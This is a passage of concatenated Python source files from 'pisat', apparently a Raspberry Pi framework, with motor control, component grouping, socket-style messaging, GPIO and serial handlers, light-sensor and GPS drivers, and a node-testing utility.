value_decelerated = self._current_param * (1 - dec / 100)
if value_decelerated < 0:
value_decelerated = 0
if self._current_param >= 0:
self._driver_L.cw(value_decelerated)
self._driver_R.ccw(self._current_param)
else:
self._driver_L.ccw(self._current_param)
self._driver_R.cw(value_decelerated)
def curve_ccw(self,
dec: Union[int, float],
base: Optional[Union[int, float]] = None) -> None:
if base is not None:
self._current_param = base
value_decelerated = self._current_param * (1 - dec / 100)
if value_decelerated < 0:
value_decelerated = 0
if self._current_param >= 0:
self._driver_L.cw(self._current_param)
self._driver_R.ccw(value_decelerated)
else:
self._driver_L.ccw(value_decelerated)
self._driver_R.cw(self._current_param)
```
#### File: pisat/base/component_group.py
```python
from typing import Dict, Optional, Tuple
from pisat.base.component import Component
class ComponentGroup(Component):
"""The group of components in the pisat system.
This class represents a group of components, which means objects of
    this class hold some objects of Component inside. This class lets
    users access the internal components through its methods.
    An object of this class is also a component.
See Also
--------
pisat.base.Component : A component group holds some components.
"""
def __init__(self, name: Optional[str] = None) -> None:
"""
Parameters
----------
name : Optional[str], optional
Name of the component, by default None
"""
super().__init__(name=name)
# Map from names to internal components
self._NtoC: Dict[str, Component] = {}
def append(self, *components: Tuple[Component, ...]):
"""Append components to the inside.
        Parameters
        ----------
*components : Tuple[Component, ...]
Components to be registered inside the component group.
Raises
------
NotImplementedError
Raised if given objects are not components.
"""
for component in components:
if not isinstance(component, Component):
raise NotImplementedError(
"A given object has not implemented Component class."
)
self._NtoC[component.name] = component
def get_component(self, name: str) -> Optional[Component]:
"""Retrieve a component from its name.
        This method returns None if the given name doesn't match
any names of internal components of the component group.
Parameters
----------
name : str
Name of the component.
Returns
-------
Optional[Component]
            Component whose name matches the given name, if it exists.
Raises
------
TypeError
Raised if the given name is not str.
"""
if not isinstance(name, str):
raise TypeError(
"'name' must be str."
)
return self._NtoC.get(name)
def get_components(self, *names: Tuple[str, ...]) -> Dict[str, Component]:
"""Retrieve components from their names.
This method returns the result as a dictionary, whose keys are
names of components and values are objects of Component. If no
        given names match names of internal components, then an empty
dictionary is returned.
This method uses the 'get_component' method inside.
Parameters
----------
*names : Tuple[str, ...]
Names of components for retrieving.
Returns
-------
Dict[str, Component]
            Components whose names match the given names, if any exist.
"""
result = {}
for name in names:
obj = self.get_component(name)
if obj is not None:
result[name] = obj
return result
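if __name__ == "__main__":
    # Minimal usage sketch added for illustration; it is not part of the
    # original module.  `_Demo` and the component names are hypothetical
    # placeholders, and only the methods defined above are exercised.
    class _Demo(Component):
        pass

    group = ComponentGroup(name="sensors")
    gps, barometer = _Demo(name="gps"), _Demo(name="barometer")
    group.append(gps, barometer)
    assert group.get_component("gps") is gps
    assert sorted(group.get_components("gps", "barometer")) == ["barometer", "gps"]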
```
#### File: comm/transceiver/comm_socket.py
```python
from typing import Optional, Union
from pisat.base.component import Component
from pisat.comm.transceiver.comm_stream import CommBytesStream
from pisat.comm.transceiver.transceiver_base import TypeAddress
class CommSocket(Component):
"""Socket to communicate pear to pear via transceiver.
This class represents object like the socket of python,
whose has a single connection.
This class is not instanciated by users, but by a
SocketTransceiver object.
"""
# NOTE this transceiver must be SocketTransceiver
def __init__(self,
transceiver,
recv_stream: CommBytesStream,
send_stream: CommBytesStream,
address_mine: TypeAddress,
address_yours: TypeAddress,
name: Optional[str] = None) -> None:
"""
Parameters
----------
transceiver : SocketTransceiver
SocketTransceiver which generates this object.
recv_stream : CommBytesStream
Internal stream for receiveing data.
send_stream : CommBytesStream
Internal stream for sending data.
address_mine : TypeAddress
Logical address of this socket.
address_yours : TypeAddress
Logical address of the other socket to communicate.
name : Optional[str], optional
Name of this component, by default None
"""
super().__init__(name=name)
self._transceiver = transceiver
self._recv_stream: CommBytesStream = recv_stream
self._send_stream: CommBytesStream = send_stream
self._addr_mine: TypeAddress = address_mine
self._addr_yours: TypeAddress = address_yours
@property
def addr_mine(self):
return self._addr_mine
@property
def addr_yours(self):
return self._addr_yours
@property
def counts_recv(self):
return len(self._recv_stream)
@property
def counts_send(self):
return len(self._send_stream)
@property
def period(self):
return self._transceiver.period
@property
def certain(self):
return self._transceiver.certain
def encode(self, data: str) -> bytes:
"""Encode str into bytes with certain encoding.
Parameters
----------
data : str
Data to be encoded.
Returns
-------
bytes
Data encoded.
"""
return self._transceiver.encode(data)
def decode(self, data: Union[bytes, bytearray]) -> str:
"""Decode bytes into str with certain encoding.
Parameters
----------
data : Union[bytes, bytearray]
Data to be decoded.
Returns
-------
str
Data decoded.
"""
return self._transceiver.decode(data)
def close(self) -> None:
"""Close this socket.
This method deletes the object. After execution of the method,
the object will not be accessed.
"""
self._transceiver.closes(self)
def recv(self, count: int = -1, load: bool = True, ignore: bool = False) -> bytes:
"""Receive data from the other socket.
Parameters
----------
count : int
Size of bytes to be received.
load : bool, optional
            Whether to load the internal receiving buffer first, by default True
Returns
-------
bytes
Data which is received successfully.
Notes
-----
        The returned data may be smaller than requested when no more
        data can be retrieved.
"""
if load:
self._transceiver.load(ignore=ignore)
if count < 0:
count = self.counts_recv
return self._recv_stream.pop(count)
def send_later(self, data: Union[bytes, bytearray]) -> None:
"""Add data into the internal buffer as reserved data.
        This method adds data into the internal buffer, but the
        data is not sent until the buffer is flushed. If you
want to send after this method, then you can use the
'flush' method to flush the internal buffer.
Parameters
----------
data : Union[bytes, bytearray]
            Data to be sent in the future.
Notes
-----
If you want to send earlier, consider using the 'send'
method.
"""
self._send_stream.add(data)
def flush(self,
blocking: bool = True,
period: Optional[float] = None,
certain: Optional[bool] = None) -> None:
"""Flush internal sending-buffer of the socket.
Parameters
----------
blocking : bool, optional
            Whether to block until the flush completes, by default True
period : Optional[float], optional
Period for sending, by default None
certain : Optional[bool], optional
If the transceiver sends data certainly, by default None
Notes
-----
If period is None, then the method uses the value of
CommSocket.period property as the parameter of period.
If the 'blocking' is False, then this method executes
the task of sending in another thread.
If certain is None, then the method uses the value of
CommSocket.certain property as the parameter of certain.
"""
self._transceiver.flush(socket=self, blocking=blocking, period=period, certain=certain)
def send(self,
data: Union[bytes, bytearray],
blocking: bool = True,
period: Optional[float] = None,
certain: Optional[bool] = None) -> None:
"""Send data to the other socket.
        Calling this method is the same as calling the 'send_later' method
and the 'flush' method in a row.
Parameters
----------
data : Union[bytes, bytearray]
            Data to be sent.
        blocking : bool, optional
            Whether to block until the flush completes, by default True
period : Optional[float], optional
Period for sending, by default None
certain : Optional[bool], optional
If the transceiver sends data certainly, by default None
Notes
-----
If period is None, then the method uses the value of
CommSocket.period property as the parameter of period.
If the 'blocking' is False, then this method executes
the task of sending in another thread.
If certain is None, then the method uses the value of
CommSocket.certain property as the parameter of certain.
"""
self._send_stream.add(data)
self.flush(blocking=blocking, period=period, certain=certain)
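# --------------------------------------------------------------------------------
# Usage sketch added for illustration; it is not part of the original module.
# A CommSocket is handed out by a SocketTransceiver rather than built directly,
# so `sock` below is assumed to be such a socket; only methods defined above
# are used.
#
#     sock.send(sock.encode("ping"), blocking=True)   # encode str -> bytes, then send
#     sock.send_later(b"queued")                      # buffer without sending yet
#     sock.flush(blocking=False)                      # flush the buffer in another thread
#     reply = sock.decode(sock.recv())                # drain whatever has arrived
#     sock.close()
# --------------------------------------------------------------------------------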
```
#### File: core/logger/refque.py
```python
from threading import Lock
from collections import deque
from typing import Deque, Generic, Optional, TypeVar
from copy import deepcopy
from pisat.base.component import Component
from pisat.model.datamodel import DataModelBase
Model = TypeVar("Model")
class RefQueue(Component, Generic[Model]):
"""Queue with a lock.
    This object is often used by a DataLogger object for retrieving the
    same data as a LogQueue. The object holds data synchronized with the
    LogQueue, but with a smaller capacity.
See Also
--------
pisat.core.logger.DataLogger : An operator of this object.
pisat.core.logger.LogQueue : Main container of data log.
"""
def __init__(self,
maxlen: int = 100,
name: Optional[str] = None) -> None:
"""
Parameters
----------
maxlen : int, optional
size of inner deque, by default 100.
name : Optional[str], optional
name of this component, by default None.
"""
super().__init__(name)
self._lock: Lock = Lock()
self._que: Deque[Model] = deque(maxlen=maxlen)
@property
def islocked(self) -> bool:
return self._lock.locked()
def get(self) -> Deque[Model]:
"""Get deep copy of inner deque in the way of thread safe.
Returns
-------
        Deque[Model]
            A copy of the inner deque.
"""
with self._lock:
que = deepcopy(self._que)
return que
def append(self, x: Model):
"""Append data into inner deque.
Parameters
----------
        x : Model
            The data record to be logged.
"""
with self._lock:
self._que.appendleft(x)
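if __name__ == "__main__":
    # Minimal usage sketch added for illustration; it is not part of the
    # original module.  The queued strings stand in for the DataModelBase
    # instances that a DataLogger would normally append.
    que = RefQueue(maxlen=3, name="ref_queue_demo")
    for record in ("log-1", "log-2", "log-3", "log-4"):
        que.append(record)
    snapshot = que.get()     # deep copy taken under the lock
    print(list(snapshot))    # newest first: ['log-4', 'log-3', 'log-2']
    print(que.islocked)      # False outside of get()/append()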
```
#### File: pisat/handler/digital_io_handler_base.py
```python
from typing import Optional
from pisat.handler.handler_base import HandlerBase
class DigitalIOHandlerBase(HandlerBase):
def __init__(self,
pin: int,
name: Optional[str] = None) -> None:
super().__init__(name=name)
self._pin: int = pin
@property
def pin(self):
return self._pin
```
#### File: pisat/handler/pigpio_digital_input_handler.py
```python
from typing import Optional
from pisat.util.platform import is_raspberry_pi
from pisat.handler.digital_input_handler_base import DigitalInputHandlerBase
if is_raspberry_pi():
import pigpio
class PigpioDigitalInputHandler(DigitalInputHandlerBase):
def __init__(self,
pi,
pin: int,
pullup: bool = False,
pulldown: bool = False,
name: Optional[str] = None) -> None:
self._pi: pigpio.pi = pi
self._pi.set_mode(pin, pigpio.INPUT)
super().__init__(pin, pullup=pullup, pulldown=pulldown, name=name)
def set_pull_up_down(self, pulldown: bool = False) -> None:
if pulldown:
self._pi.set_pull_up_down(self._pin, pigpio.PUD_DOWN)
else:
self._pi.set_pull_up_down(self._pin, pigpio.PUD_UP)
def clear_pull_up_down(self) -> None:
        self._pi.set_pull_up_down(self._pin, pigpio.PUD_OFF)  # PUD_OFF disables the pull resistor; PUD_DOWN would keep a pull-down active.
def observe(self) -> bool:
return bool(self._pi.read(self._pin))
```
#### File: pisat/handler/pyserial_serial_handler.py
```python
from typing import Optional, Tuple, Union
from enum import Enum
from serial import Serial
from pisat.handler.serial_handler_base import SerialHandlerBase
class PyserialSerialHandler(SerialHandlerBase):
class Baudrate(Enum):
RATE_50 = 50
RATE_75 = 75
RATE_110 = 110
RATE_134 = 134
RATE_150 = 150
RATE_200 = 200
RATE_300 = 300
RATE_600 = 600
RATE_1200 = 1200
RATE_1800 = 1800
RATE_2400 = 2400
RATE_4800 = 4800
RATE_9600 = 9600
RATE_19200 = 19200
RATE_38400 = 38400
RATE_57600 = 57600
RATE_115200 = 115200
RATE_230400 = 230400
RATE_460800 = 460800
RATE_500000 = 500000
RATE_576000 = 576000
RATE_921600 = 921600
RATE_1000000 = 1000000
RATE_1152000 = 1152000
RATE_1500000 = 1500000
RATE_2000000 = 2000000
RATE_2500000 = 2500000
RATE_3000000 = 3000000
RATE_3500000 = 3500000
RATE_4000000 = 4000000
@classmethod
def is_valid(cls, baudrate: int) -> bool:
for rate in cls:
if baudrate == rate.value:
return True
return False
def __init__(self,
port: str,
baudrate: int = 115200,
read_timeout: Optional[float] = None,
write_timeout: Optional[float] = None,
name: Optional[str] = None):
super().__init__(port, baudrate, name=name)
self._serial: Serial = Serial(port,
baudrate=baudrate,
timeout=read_timeout,
write_timeout=write_timeout)
@property
def counts_readable(self):
return self._serial.in_waiting
@property
def counts_writable(self):
return self._serial.out_waiting
def read(self, count: int) -> Tuple[int, bytes]:
if count < 0:
raise ValueError(
"'count' must be no less than 0."
)
res = self._serial.read(size=count)
return (len(res), res)
def write(self, data: Union[bytes, bytearray]) -> None:
self._serial.write(data)
def flush(self) -> None:
self._serial.flush()
```
#### File: pisat/handler/rpigpio_digital_input_handler.py
```python
from typing import Optional
from pisat.util.platform import is_raspberry_pi
from pisat.handler.digital_input_handler_base import DigitalInputHandlerBase
if is_raspberry_pi():
from RPi import GPIO
class RpiGpioDigitalInputHandler(DigitalInputHandlerBase):
def __init__(self,
pin: int,
pullup: bool = False,
pulldown: bool = False,
name: Optional[str] = None) -> None:
GPIO.setmode(GPIO.BCM)
super().__init__(pin, name=name)
# Setup default mode.
if not (pullup or pulldown):
GPIO.setup(pin, GPIO.IN)
def close(self) -> None:
GPIO.cleanup(self._pin)
def set_pull_up_down(self, pulldown: bool) -> None:
if pulldown:
GPIO.setup(self._pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
else:
GPIO.setup(self._pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def clear_pull_up_down(self) -> None:
# TODO Find better way
        GPIO.cleanup(self._pin)  # RPi.GPIO provides 'cleanup', not 'clean'; release the pin before re-setup.
GPIO.setup(self._pin, GPIO.IN)
def observe(self) -> bool:
return bool(GPIO.input(self._pin))
```
#### File: pisat/handler/serial_handler_base.py
```python
import time
from typing import Optional, Tuple, Union
from enum import Enum
from pisat.handler.handler_base import HandlerBase
class SerialHandlerBase(HandlerBase):
class Port(Enum):
USB_0 = "/dev/ttyUSB0"
USB_1 = "/dev/ttyUSB1"
USB_2 = "/dev/ttyUSB2"
USB_3 = "/dev/ttyUSB3"
UART = "/dev/serial0"
def __init__(self,
port: str,
baudrate: int,
name: Optional[str] = None) -> None:
super().__init__(name=name)
self._port: str = port
self._baudrate: int = baudrate
@property
def port(self):
return self._port
@property
def baudrate(self):
return self._baudrate
@property
def counts_readable(self):
pass
def close(self) -> None:
pass
def read(self, count: int) -> Tuple[int, bytes]:
pass
def readline(self, end: bytes = b'\n', timeout: float = 0.) -> bytes:
result = bytearray()
cursor = 0
tail = len(end)
time_last = - 1
while True:
if not self.counts_readable:
if time_last < 0:
time_last = time.time()
continue
if time.time() - time_last > timeout:
break
else:
continue
else:
time_last = - 1
count, char = self.read(1)
result.extend(char)
if ord(char) == end[cursor]:
cursor += 1
if cursor == tail:
break
else:
cursor = 0
return bytes(result)
def readlines(self, size: int = -1, end: bytes = b'\n') -> Tuple[bytes]:
result = []
if size < 0:
while True:
line = self.readline(end=end)
if not len(line):
break
result.append(line)
else:
for _ in range(size):
result.append(self.readline(end=end))
return result
def write(self, data: Union[bytes, bytearray]) -> None:
pass
```
#### File: pisat/handler/spi_handler_base.py
```python
from typing import Optional, Tuple, Union
from pisat.handler.handler_base import HandlerBase
class SPIHandlerBase(HandlerBase):
def __init__(self,
baudrate: int,
name: Optional[str] = None) -> None:
super().__init__(name=name)
self._baudrate = baudrate
@property
def baudrate(self):
return self._baudrate
def close(self) -> None:
pass
def read(self, count: int) -> Tuple[int, bytes]:
pass
def write(self, data: Union[bytes, bytearray]) -> None:
pass
def xfer(self, data: Union[bytes, bytearray]) -> Tuple[int, bytes]:
pass
```
#### File: pisat/model/linked_datamodel.py
```python
import inspect
from typing import Any, Dict, Generic, List, Optional, Tuple
from pisat.model.datamodel import (
loggable, DataModelBase, Loggable, Model, GetReturn
)
from pisat.util.deco import class_property
class linked_loggable(loggable, Generic[Model, GetReturn, Loggable]):
def __init__(self,
loggable: loggable,
publisher: str,
logging: bool = True,
default: Optional[Any] = None) -> None:
super().__init__(loggable._fget)
self._loggable = loggable
self._model = None
self._publisher = publisher
self._logging = logging
self._default = default
def __get__(self, obj: Any, clazz: Optional[type] = None):
if obj is None:
return self
if self._fget is not None:
if self._model is not None:
return self._fget(self._model)
else:
return self._default
def extract(self, model: Model, dname: str) -> Dict[str, Loggable]:
        # Allow the linked data to be excluded from logging.
if self._logging:
return super().extract(model, dname)
else:
return {}
@property
def publisher(self) -> str:
return self._publisher
def sync(self, model: DataModelBase) -> None:
self._model = model
class LinkedDataModelBase(DataModelBase):
_linked_loggables: List[Tuple[str, linked_loggable]]
_Pub2Link: Dict[str, List[linked_loggable]]
def __init_subclass__(cls) -> None:
super().__init_subclass__()
cls._linked_loggables = inspect.getmembers(cls, lambda x: isinstance(x, linked_loggable))
cls._Pub2Link = {}
for _, linked in cls._linked_loggables:
if cls._Pub2Link.get(linked.publisher) is None:
cls._Pub2Link[linked.publisher] = []
cls._Pub2Link[linked.publisher].append(linked)
@class_property
def linked_loggables(cls):
return cls._linked_loggables
def sync(self, *models: DataModelBase):
        # NOTE Models without any linked loggables here are simply ignored.
for model in models:
links = self._Pub2Link.get(model.publisher)
if links is not None:
for link in links:
link.sync(model)
```
#### File: pisat/sensor/apds9301.py
```python
import math
from typing import Optional, Tuple
from pisat.handler.i2c_handler_base import I2CHandlerBase
from pisat.model.datamodel import DataModelBase, loggable
from pisat.sensor.sensor_base import HandlerMismatchError, HandlerNotSetError
from pisat.sensor.sensor_base import SensorBase
class Apds9301(SensorBase):
ADDRESS_I2C_GND = 0x29
ADDRESS_I2C_FLOAT = 0x39
ADDRESS_I2C_VDD = 0x49
# - - - - - - - - - - - - - - - -
# NOTE
#
# 1. Each register is represented as a combination of
# the command field bits and one of the bits
# of the register address.
# - - - - - - - - - - - - - - - -
# BITS OF COMMAND FIELD
BITS_COMMAND_CMD = 0b10000000
BITS_COMMAND_CLEAR = 0b01000000
BITS_COMMAND_WORD = 0b00100000
# BITS OF REGISTER ADDRESS
BITS_REG_CTRL = 0x0
BITS_REG_TIMING = 0x1
BITS_REG_THRESH_LOW_LOW = 0x2
BITS_REG_THRESH_LOW_HIGH = 0x3
BITS_REG_THRESH_HIGH_LOW = 0x4
BITS_REG_THRESH_HIGH_HIGH = 0x5
BITS_REG_INTERRUPT = 0x6
BITS_REG_ID = 0xA
BITS_REG_DATA0 = (0xC, 0xD)
BITS_REG_DATA1 = (0xE, 0xF)
# BITS ABOUT CONTROL REGISTER
BITS_POW_UP = 0x03
BITS_POW_DOWN = 0x00
# BITS ABOUT TIMING REGISTER
BITS_TIMING_GAIN_HIGH = 0b00010000
BITS_TIMING_GAIN_LOW = 0b00000000
BITS_TIMING_MANUAL_START = 0b00001000
BITS_TIMING_MANUAL_STOP = 0b00000000
BITS_TIMING_INTEGRATION_0 = 0b00000000
BITS_TIMING_INTEGRATION_1 = 0b00000001
BITS_TIMING_INTEGRATION_2 = 0b00000010
BITS_TIMING_INTEGRATION_MANUAL = 0b00000011
# BITS ABOUT INTERRUPT CONTROL REGISTER
BITS_INTR_LEVEL_DISABLED = 0b00000000
BITS_INTR_LEVEL_ENABLED = 0b00010000
# CONSTANT VALUES ABOUT REGISTERS
SIZE_BYTES_REG_DATA = 4
BITS_TIMING_INTEG_DEFAULT = BITS_TIMING_INTEGRATION_2
BITS_THRESHOLD_DEFAULT = 0x0000
THRESHOLD_MAX = 0xFFFF
THRESHOLD_MIN = 0x0000
PERSISTENCE_MAX = 0xF
PERSISTENCE_MIN = 0x0
ID_ON_DEBUG = -1
# - - - - - - - - - - - - - - - -
# OPTIONS
#
# * Gain
# value | mode
# -----------------------------
# 0 | high gain mode
# 1 | low gain mode
#
# * Manual Timing Control
# value | feature
# -----------------------------------------
# 0 | stop an integration cycle
# 1 | begin an integration cycle
# NOTE
# The Manual Timing Control option will work only when INTEG
# is set as 0x11.
#
# * INTEG
# value | nominal integration time
# -----------------------------------------
# 00 | 13.7 ms
# 01 | 101 ms
# 10 | 402 ms
# 11 | N/A
# - - - - - - - - - - - - - - - -
class DataModel(DataModelBase):
def setup(self, illum):
self._illum = illum
@loggable
def illuminance(self):
return self._illum
def __init__(self,
handler: I2CHandlerBase,
name: Optional[str] = None) -> None:
if not isinstance(handler, I2CHandlerBase):
raise HandlerMismatchError(
"'handler' must be HandlerI2C."
)
super().__init__(name)
self._handler: Optional[I2CHandlerBase] = handler
self._gain: int = self.BITS_TIMING_GAIN_LOW
self._manual: int = self.BITS_TIMING_MANUAL_STOP
self._integ: int = self.BITS_TIMING_INTEG_DEFAULT
self._id: int = self.ID_ON_DEBUG
self._threshold_low: int = self.BITS_THRESHOLD_DEFAULT
self._threshold_high: int = self.BITS_THRESHOLD_DEFAULT
self._level: int = self.BITS_INTR_LEVEL_DISABLED
self._persistence: int = 0
# setup device when a HandlerI2C is given.
self.power_up()
self._id: int = self._read_id()
def read(self):
ch0, ch1 = self._read_raw_data()
illum = self.calc_illum(ch0, ch1)
model = self.DataModel(self.name)
model.setup(illum)
return model
@classmethod
def calc_illum(cls, ch0, ch1) -> float:
# Guard against division by zero when the broadband channel (ch0) reads 0
if ch0 == 0:
return 0.
p = ch1 / ch0
lux = 0.
if 0 < p <= 0.5:
lux = 0.0304 * ch0 - 0.062 * ch0 * math.pow(p, 1.4)
elif p <= 0.61:
lux = 0.0224 * ch0 - 0.031 * ch1
elif p <= 0.80:
lux = 0.0128 * ch0 - 0.0153 * ch1
elif p <= 1.30:
lux = 0.00146 * ch0 - 0.00112 * ch1
return lux
@property
def id(self):
return self._id
def power_up(self):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_CTRL,
self.BITS_POW_UP)
def power_down(self):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_CTRL,
self.BITS_POW_DOWN)
def set_timing(self,
highgain: Optional[bool] = None,
manual: Optional[bool] = None,
integ: Optional[int] = None):
self._check_handler()
if highgain is not None:
if isinstance(highgain, bool):
if highgain:
self._gain = self.BITS_TIMING_GAIN_HIGH
else:
self._gain = self.BITS_TIMING_GAIN_LOW
else:
raise TypeError(
"'highgain' must be bool."
)
if manual is not None:
if isinstance(manual, bool):
if manual:
self._manual = self.BITS_TIMING_MANUAL_START
else:
self._manual = self.BITS_TIMING_MANUAL_STOP
else:
raise TypeError(
"'manual' must be bool."
)
if integ is not None:
if self.BITS_TIMING_INTEGRATION_0 <= integ <= self.BITS_TIMING_INTEGRATION_MANUAL:
self._integ = integ
else:
raise ValueError(
"'integ' must be int and no less than 0 and no more than 3."
)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_TIMING,
self._gain | self._manual | self._integ)
def start_manual_integ(self):
self._check_handler()
self.set_timing(manual=True, integ=self.BITS_TIMING_INTEGRATION_MANUAL)
def stop_manual_integ(self):
self._check_handler()
self.set_timing(manual=False, integ=self.BITS_TIMING_INTEGRATION_MANUAL)
def clear_interrupt(self):
self._handler.read(self.BITS_COMMAND_CMD | self.BITS_COMMAND_CLEAR | self.BITS_REG_ID, 1)
def set_interrupt(self,
low: Optional[int] = None,
high: Optional[int] = None,
islevel: Optional[int] = None,
persistence: Optional[int] = None):
if low is not None:
if self.THRESHOLD_MIN <= low <= self.THRESHOLD_MAX:
self._threshold_low = low
lower = low & 0x00FF
upper = low & 0xFF00
self._set_threshold_low(lower, upper)
else:
raise ValueError(
"'low' must be int and in {} ~ {}"
.format(self.THRESHOLD_MIN, self.THRESHOLD_MAX)
)
if high is not None:
if self.THRESHOLD_MIN <= high <= self.THRESHOLD_MAX:
self._threshold_high = high
lower = high & 0x00FF
upper = high & 0xFF00
self._set_threshold_high(lower, upper)
else:
raise ValueError(
"'high' must be int and in {} ~ {}"
.format(self.THRESHOLD_MIN, self.THRESHOLD_MAX)
)
if islevel is not None:
if isinstance(islevel, bool):
if islevel:
self._level = self.BITS_INTR_LEVEL_ENABLED
else:
self._level = self.BITS_INTR_LEVEL_DISABLED
else:
raise TypeError(
"'islevel' must be bool."
)
if persistence is not None:
if self.PERSISTENCE_MIN <= persistence <= self.PERSISTENCE_MAX:
self._persistence = persistence
else:
raise ValueError(
"'persistence' must be int and in {} ~ {}"
.format(self.PERSISTENCE_MIN, self.PERSISTENCE_MAX)
)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_INTERRUPT,
self._level | self._persistence)
def _check_handler(self):
if self._handler is None:
raise HandlerNotSetError(
"A handler must be set for executing this method."
)
def _read_raw_data(self) -> Tuple[int, int]:
_, raw = self._handler.read(self.BITS_COMMAND_CMD | self.BITS_REG_DATA0[0],
self.SIZE_BYTES_REG_DATA)
return (raw[1] << 8 | raw[0], raw[3] << 8 | raw[2])
def _read_id(self) -> int:
_, raw = self._handler.read(self.BITS_COMMAND_CMD | self.BITS_REG_ID, 1)
return raw[0]
def _set_threshold_low(self, lower: int, upper: int):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_LOW_LOW, lower)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_LOW_HIGH, upper)
def _set_threshold_high(self, lower: int, upper: int):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_HIGH_LOW, lower)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_HIGH_HIGH, upper)
```
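The piecewise formula in `calc_illum` follows the lux equation for this family of ambient-light sensors, so it can be exercised without any I2C hardware. A minimal sketch; the channel counts below are made-up example values, not measurements, and the import path simply mirrors the file path shown above:

```python
from pisat.sensor.apds9301 import Apds9301

# Hypothetical raw channel counts (ch0 = visible + IR, ch1 = IR only)
ch0, ch1 = 2000, 600

# ch1/ch0 = 0.3 falls in the first branch (0 < p <= 0.5)
lux = Apds9301.calc_illum(ch0, ch1)
print(f"approx. illuminance: {lux:.1f} lx")   # ≈ 37.8 lx with these made-up counts
```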
#### File: pisat/sensor/sam_m8q.py
```python
from typing import Optional, Tuple, Union
from pisat.handler.i2c_handler_base import I2CHandlerBase
from pisat.handler.serial_handler_base import SerialHandlerBase
from pisat.model.datamodel import DataModelBase, loggable
from pisat.sensor.sensor_base import HandlerMismatchError, SensorBase
from pisat.sensor.serial_gps import SerialGPS
class UARTSamM8Q(SerialGPS):
pass
# TODO I2C ver.
class I2CSamM8Q(SensorBase):
pass
# TODO I2C ver.
class SamM8Q(SensorBase):
class DataModel(DataModelBase):
def setup(self,
time_utc: Optional[Tuple[Union[int, float]]] = None,
latitude: Optional[float] = None,
longitude: Optional[float] = None,
altitude: Optional[float] = None):
self._time_utc = time_utc
self._latitude = latitude
self._longitude = longitude
self._altitude = altitude
@loggable
def time_utc(self):
return self._time_utc
@time_utc.formatter
def time_utc(self):
name = self.get_tag("time_utc")
value = None
if self._time_utc is not None:
value = f"{self._time_utc[0]}:{self._time_utc[1]}:{self._time_utc[2]}"
return {name: value}
@loggable
def latitude(self):
return self._latitude
@loggable
def longitude(self):
return self._longitude
@loggable
def altitude(self):
return self._altitude
def __init__(self,
handler: Union[I2CHandlerBase, SerialHandlerBase],
name: Optional[str] = None) -> None:
super().__init__(name=name)
if isinstance(handler, SerialHandlerBase):
self._base = UARTSamM8Q(handler=handler)
elif isinstance(handler, I2CHandlerBase):
self._base = I2CSamM8Q(handler=handler)
else:
raise HandlerMismatchError(
"'handler' must be for UART or I2C."
)
self._handler = handler
def read(self):
return self._base.read()
```
#### File: tester/core/node_tester.py
```python
from typing import Any, Dict, Optional, Sequence, Tuple, Type
from pisat.tester.tester_base import Tester
from pisat.tester.core.util import simulate_judge_from, simulate_judge_from_all
from pisat.core.nav.node import Node
from pisat.core.nav.post_event import PostEvent
from pisat.core.manager.component_manager import ComponentManager
from pisat.core.logger.datalogger import DataLogger
class InappropriateDestinationError(Exception):
"""Raised if inappropriate destination of Node is found."""
pass
class NodeTester(Tester):
def __init__(self,
node: Type[Node],
manager: ComponentManager,
my_flag: Optional[Any] = None,
dlogger: Optional[DataLogger] = None) -> None:
self._node: Type[Node] = node
self._manager: ComponentManager = manager
self._my_flag = my_flag
self._dlogger: Optional[DataLogger] = dlogger
self._event: PostEvent = PostEvent()
self._current: Optional[Node] = None
def setup(self, manager: Optional[ComponentManager] = None):
if manager is not None:
self._manager = manager
self._event.clear()
self._current = self._node(self._manager, self._event)
self._current.enter()
def simulate_judge(self,
data,
manager: Optional[ComponentManager] = None) -> int:
"""Simulate Node.judge callback from given data and find the index
on which a flag is detected.
This method executes the judge callback of the internal Node with
given data and returns the result as the index on which an internal
flag is triggered. If any flags are not triggered, then the method
returns -1, and if the flag to myself is not given at initialization,
then this method always returns 0.
Parameters
----------
data : Sequence[Dict[str, Logable]]
Data for simulating
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
int
The index on which an internal flag is triggered.
"""
if self._my_flag is None:
return 0
self.setup(manager=manager)
for i, d in enumerate(data):
judged = self._current.judge(d)
if judged != self._my_flag:
return i
else:
return -1
def simulate_judge_all(self,
data,
manager: Optional[ComponentManager] = None) -> Tuple[Any]:
"""Simulate Node.judge callback by feeding given all data.
This method executes the judge callback of the internal Node with
given data and collects the results of the judge callback.
Parameters
----------
data : Sequence[Dict[str, Logable]]
Data for simulating
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
Tuple[Any]
Returned results from the judge callback.
"""
self.setup(manager=manager)
result = []
for d in data:
result.append(self._current.judge(d))
return tuple(result)
def simulate_judge_from(self,
path: str,
dnames: Optional[Sequence[str]] = None,
manager: Optional[ComponentManager] = None) -> int:
"""Simulate Node.judge callback with given data file and find the index
on which a flag is detected.
This method executes the judge callback of the internal Node with
data in given file and returns the result as the index on which an internal
flag is triggered. If any flags are not triggered, then the method
returns -1, and if the flag to myself is not given at initialization,
then this method always returns 0.
Parameters
----------
path : str
Path of a csv file.
dnames : Optional[Sequence[str]], optional
Data names if the csv file doesn't have them, by default None
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
int
The index on which an internal flag is triggered.
Raises
------
ValueError
path must represent the path of a csv file.
"""
self.setup(manager=manager)
try:
return simulate_judge_from(self._current.judge, self._my_flag, path, dnames=dnames)
except ValueError:
return 0
def simulate_judge_from_all(self,
path: str,
dnames: Optional[Sequence[str]] = None,
manager: Optional[ComponentManager] = None) -> Tuple[Any]:
"""Simulate Node.judge callback by feeding all data from given file.
This method executes the judge callback of the internal Node with
data in given file and collects the results of the judge callback.
Parameters
----------
path : str
Path of a csv file.
dnames : Optional[Sequence[str]], optional
Data names if the csv file doesn't have them, by default None
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
